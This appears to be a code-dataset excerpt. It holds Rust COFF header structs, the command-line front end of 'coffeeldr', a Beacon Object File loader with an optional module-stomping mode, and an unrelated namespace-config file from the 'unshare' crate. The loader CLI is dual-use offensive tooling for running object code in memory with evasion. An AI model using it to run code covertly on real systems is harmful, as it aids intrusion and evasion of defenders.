#[repr(C, packed(2))]
#[derive(Clone, Copy)]
pub struct IMAGE_SYMBOL_0_0 {
    /// First half of the 8-byte name field; zero when a long name is used
    /// (per COFF convention — `get_symbol_name` checks `ShortName[0]` instead).
    pub Short: u32,
    /// Offset of the name inside the string table
    /// (this is what `get_symbol_name` reads for long names).
    pub Long: u32,
}
/// Represents a section header in a COFF file.
///
/// The `Misc` union cannot be parsed directly, so its raw bytes are read
/// into the temp field `misc_raw` and re-packaged via `#[br(calc = ...)]`.
#[binread]
#[repr(C)]
#[br(little)]
#[derive(Clone, Copy)]
pub struct IMAGE_SECTION_HEADER {
    /// The name of the section (8 bytes).
    pub Name: [u8; 8],
    #[br(temp)]
    misc_raw: u32,
    /// The virtual address of the section in memory.
    pub VirtualAddress: u32,
    /// The size of the section's raw data.
    pub SizeOfRawData: u32,
    /// The file offset of the raw data (0 when the section has no file backing).
    pub PointerToRawData: u32,
    /// The pointer to relocation entries.
    pub PointerToRelocations: u32,
    /// The pointer to line numbers (if any).
    pub PointerToLinenumbers: u32,
    /// The number of relocations in the section.
    pub NumberOfRelocations: u16,
    /// The number of line numbers in the section.
    pub NumberOfLinenumbers: u16,
    /// Characteristics that describe the section (e.g., executable, writable).
    pub Characteristics: u32,
    #[br(calc = IMAGE_SECTION_HEADER_0 {
        PhysicalAddress: misc_raw
    })]
    pub Misc: IMAGE_SECTION_HEADER_0,
}
/// A union representing either the physical or virtual size of the section.
#[repr(C)]
#[derive(Clone, Copy)]
pub union IMAGE_SECTION_HEADER_0 {
    /// The physical address of the section.
    pub PhysicalAddress: u32,
    /// The virtual size of the section.
    pub VirtualSize: u32,
}
/// Represents a relocation entry in a COFF file.
///
/// The leading union is read as raw bytes (`va_raw`) and rebuilt through
/// `#[br(calc = ...)]`, since `binrw` cannot parse a union field directly.
#[binread]
#[br(little)]
#[repr(C, packed(2))]
pub struct IMAGE_RELOCATION {
    #[br(temp)]
    va_raw: u32,
    /// The index of the symbol in the symbol table.
    pub SymbolTableIndex: u32,
    /// The type of relocation.
    pub Type: u16,
    #[br(calc = IMAGE_RELOCATION_0 {
        VirtualAddress: va_raw
    })]
    pub Anonymous: IMAGE_RELOCATION_0,
}
/// A union representing either the virtual address or relocation count.
#[repr(C, packed(2))]
pub union IMAGE_RELOCATION_0 {
    /// The virtual address of the relocation.
    pub VirtualAddress: u32,
    /// The relocation count.
    pub RelocCount: u32,
}
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/cli/src/main.rs | cli/src/main.rs | use clap_verbosity_flag::Verbosity;
use log::{error, info};
use clap::Parser;
use base64::{engine::general_purpose, Engine as _};
use coffeeldr::{BeaconPack, CoffeeLdr};
mod logging;
/// The main command-line interface struct.
///
/// Parsed by `clap`'s derive API; `verbose` is flattened from
/// `clap_verbosity_flag` to provide the standard `-v/-q` switches.
#[derive(Parser)]
#[clap(author="joaoviictorti", about="A COFF loader written in Rust")]
pub struct Cli {
    /// The command to be executed.
    #[arg(short, long, required = true)]
    pub bof: String,
    /// Entrypoint to use in the execution.
    /// Defaults to "go" on 64-bit builds and "_go" on 32-bit builds.
    #[arg(short, long, default_value_t = default_entrypoint())]
    pub entrypoint: String,
    /// Multiple arguments in the format `/short:<value>`, `/int:<value>`, `/str:<value>`, `/wstr:<value>`, `/bin:<base64-data>`, `/bin_path:<bin-file-path>`
    #[arg(value_parser)]
    pub inputs: Option<Vec<String>>,
    /// Enables module stomping (e.g., --stomping chakra.dll)
    #[arg(long)]
    pub stomping: Option<String>,
    #[command(flatten)]
    pub verbose: Verbosity,
}
/// Returns the architecture-appropriate default BOF entrypoint name.
///
/// 64-bit targets use the bare symbol `go`; 32-bit targets use the
/// underscore-prefixed `_go`.
fn default_entrypoint() -> String {
    let name = match cfg!(target_pointer_width = "64") {
        true => "go",
        false => "_go",
    };
    name.to_string()
}
/// Processes each input according to its type and adds it to the buffer.
///
/// Supported prefixes: `/short:`, `/int:`, `/str:`, `/wstr:`,
/// `/bin:<base64-data>` and `/bin_path:<file-path>`.
///
/// Returns a human-readable error string when the prefix is unknown, the
/// value fails to parse/decode, or the referenced file cannot be read.
// Rewritten with `str::strip_prefix` instead of `starts_with` plus manual
// magic-offset slicing (`&input[7..]` etc.), which was easy to get wrong
// when a prefix changes length.
fn process_input(input: &str, pack: &mut BeaconPack) -> Result<(), String> {
    if let Some(short_data) = input.strip_prefix("/short:") {
        let value = short_data
            .parse::<i16>()
            .map_err(|e| format!("Error converting to short: {e}"))?;
        pack.addshort(value);
        info!("Added short: {}", value);
    } else if let Some(int_data) = input.strip_prefix("/int:") {
        let value = int_data
            .parse::<i32>()
            .map_err(|e| format!("Error converting to int: {e}"))?;
        pack.addint(value);
        info!("Added int: {}", value);
    } else if let Some(str_data) = input.strip_prefix("/str:") {
        pack.addstr(str_data).map_err(|e| format!("Error adding str: {e}"))?;
        info!("Added string: {}", str_data);
    } else if let Some(wstr_data) = input.strip_prefix("/wstr:") {
        pack.addwstr(wstr_data);
        info!("Added wide string: {}", wstr_data);
    } else if let Some(base64_data) = input.strip_prefix("/bin:") {
        let decoded = general_purpose::STANDARD
            .decode(base64_data)
            .map_err(|e| format!("Error decoding Base64: {e}"))?;
        pack.addbin(&decoded).map_err(|e| format!("Error adding bin: {e}"))?;
        info!("Added binary: {}", base64_data);
    } else if let Some(file_path) = input.strip_prefix("/bin_path:") {
        let file_fd = std::path::Path::new(file_path);
        if !file_fd.exists() {
            return Err(format!("File not found: {}", file_path));
        }
        let file_data = std::fs::read(file_fd)
            .map_err(|e| format!("Error reading file '{}': {e}", file_path))?;
        pack.addbin(&file_data).map_err(|e| format!("Error adding bin: {e}"))?;
        info!("Added binary file: {}", file_path);
    } else {
        return Err(format!("Invalid input format: {input}"));
    }

    Ok(())
}
fn main() -> Result<(), Box<dyn std::error::Error>> {
// Parse CLI arguments
let cli = Cli::parse();
// Initializes global logger
logging::init_logger(&cli.verbose);
// Initialize the buffer
let mut pack = BeaconPack::default();
// Process inputs if provided
if let Some(inputs) = &cli.inputs {
for input in inputs {
process_input(input, &mut pack)
.map_err(|e| error!("{e}"))
.map_err(|_| "Input processing failed")?;
}
} else {
info!("No inputs were provided.");
}
// Prepare buffer and length if inputs were provided
let vec_buffer = if cli.inputs.is_some() {
// Get the buffer from the pack
Some(pack.get_buffer_hex()?)
} else {
None
};
let (buffer, len) = if let Some(ref buf) = vec_buffer {
// Pass the pointer and length if buffer exists
(Some(buf.as_ptr() as *mut u8), Some(buf.len()))
} else {
// No inputs, pass None
(None, None)
};
// Run CoffeeLdr
let mut coffee = CoffeeLdr::new(cli.bof.as_str())?;
coffee = if let Some(ref module_name) = cli.stomping {
info!("Module stomping enabled: {}", module_name);
coffee.with_module_stomping(module_name)
} else {
coffee
};
match coffee.run(&cli.entrypoint, buffer, len) {
Ok(result) => print!("Output:\n {result}"),
Err(err_code) => error!("{:?}", err_code),
}
Ok(())
}
| rust | Apache-2.0 | 45fcea8c7145e4d4afa2fe59950cbb491f80dbc3 | 2026-01-04T20:21:47.060296Z | false |
joaoviictorti/coffeeldr | https://github.com/joaoviictorti/coffeeldr/blob/45fcea8c7145e4d4afa2fe59950cbb491f80dbc3/cli/src/logging.rs | cli/src/logging.rs | use clap_verbosity_flag::Verbosity;
use env_logger::Builder;
use log::{Level, LevelFilter};
/// Initializes the logger
pub fn init_logger(verbosity: &Verbosity) {
let level = verbosity
.log_level()
.map(level_to_filter)
.unwrap_or(LevelFilter::Warn);
Builder::new()
.filter_level(level)
.parse_default_env()
.init();
}
/// Maps a `log::Level` onto the equivalent `LevelFilter`.
///
/// NOTE(review): `log::Level::to_level_filter()` appears to provide this
/// exact mapping upstream; consider replacing this helper — confirm the
/// `log` crate version in use supports it.
fn level_to_filter(level: Level) -> LevelFilter {
    match level {
        Level::Error => LevelFilter::Error,
        Level::Warn => LevelFilter::Warn,
        Level::Info => LevelFilter::Info,
        Level::Debug => LevelFilter::Debug,
        Level::Trace => LevelFilter::Trace,
    }
}
tailhook/unshare | https://github.com/tailhook/unshare/blob/6cdc15d97aca90f59d1427e01da4c461184d0fe4/src/config.rs | src/config.rs | use std::default::Default;
use std::ffi::CString;
use std::collections::HashMap;
use nix::sys::signal::{Signal, SIGKILL};
use nix::sched::CloneFlags;
use libc::{uid_t, gid_t};
use crate::idmap::{UidMap, GidMap};
use crate::namespace::Namespace;
use crate::stdio::Closing;
/// Raw process-setup options accumulated by the builder API and consumed
/// when the child is spawned.
pub struct Config {
    /// Parent-death signal for the child; `None` disables it. Defaults to
    /// `SIGKILL` (see `Default` impl).
    /// NOTE(review): presumably applied via prctl(PR_SET_PDEATHSIG) in the
    /// child-setup code — confirm there.
    pub death_sig: Option<Signal>,
    /// Working directory for the child, if set — TODO confirm where it is
    /// applied during child setup.
    pub work_dir: Option<CString>,
    /// User id to switch the child to, if set.
    pub uid: Option<uid_t>,
    /// Group id to switch the child to, if set.
    pub gid: Option<gid_t>,
    /// Supplementary groups for the child; `None` leaves them untouched.
    pub supplementary_gids: Option<Vec<gid_t>>,
    /// UID and GID mappings for a user namespace, if any.
    pub id_maps: Option<(Vec<UidMap>, Vec<GidMap>)>,
    /// Clone flags selecting which namespaces to create for the child.
    pub namespaces: CloneFlags,
    /// Existing namespace file descriptors for the child to join
    /// (presumably via setns(2) — confirm in the exec path).
    pub setns_namespaces: HashMap<Namespace, Closing>,
    /// Whether to restore the signal mask in the child (default: true).
    pub restore_sigmask: bool,
    /// Whether to make the child a process-group leader (default: false).
    pub make_group_leader: bool,
    // TODO(tailhook) session leader
}
impl Default for Config {
fn default() -> Config {
Config {
death_sig: Some(SIGKILL),
work_dir: None,
uid: None,
gid: None,
supplementary_gids: None,
id_maps: None,
namespaces: CloneFlags::empty(),
setns_namespaces: HashMap::new(),
restore_sigmask: true,
make_group_leader: false,
}
}
}
| rust | Apache-2.0 | 6cdc15d97aca90f59d1427e01da4c461184d0fe4 | 2026-01-04T20:21:52.548549Z | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.